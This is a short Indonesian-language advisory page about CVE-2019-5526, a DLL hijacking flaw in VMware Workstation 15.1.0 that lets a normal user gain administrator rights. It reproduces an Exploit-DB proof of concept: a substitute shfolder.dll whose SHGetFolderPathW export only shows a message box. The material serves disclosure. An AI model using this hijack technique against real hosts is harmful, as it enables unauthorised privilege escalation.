VMware Workstation DLL hijacking 15.1.0 - VMware Workstation contains a DLL hijacking issue because some DLL :
VMware memiliki pembaruan yang tersedia untuk mengurangi DLL-hijacking vulnerability di VMware Workstation Pro / Player (Workstation).
Baca Juga : Koalisi Nasional Tolak RUU Keamanan dan Ketahanan Siber
Kerentanan memiliki nomor kasus CVE-2019-5526 dan memiliki scope CVSS 6.0.
VMware Workstation berisi masalah DLL Hijacking karena beberapa file DLL tidak dimuat dengan benar oleh aplikasi.
Eksploitasi yang berhasil dari masalah ini memungkinkan penyerang dengan hak pengguna normal untuk meningkatkan hak mereka ke administrator pada host windows di mana Workstation diinstal.
ID EDB-ID: 46851
Type exploitdb
Reporter Exploit-DB
Modified 2019-05-16 00:00:00
DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()POC :
#include "dll.h"
#include <windows.h>
DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}
Refrensi :
1. https://www.vmware.com/security/advisories/VMSA-2019-0007.html
2. https://www.exploit-db.com/exploits/46851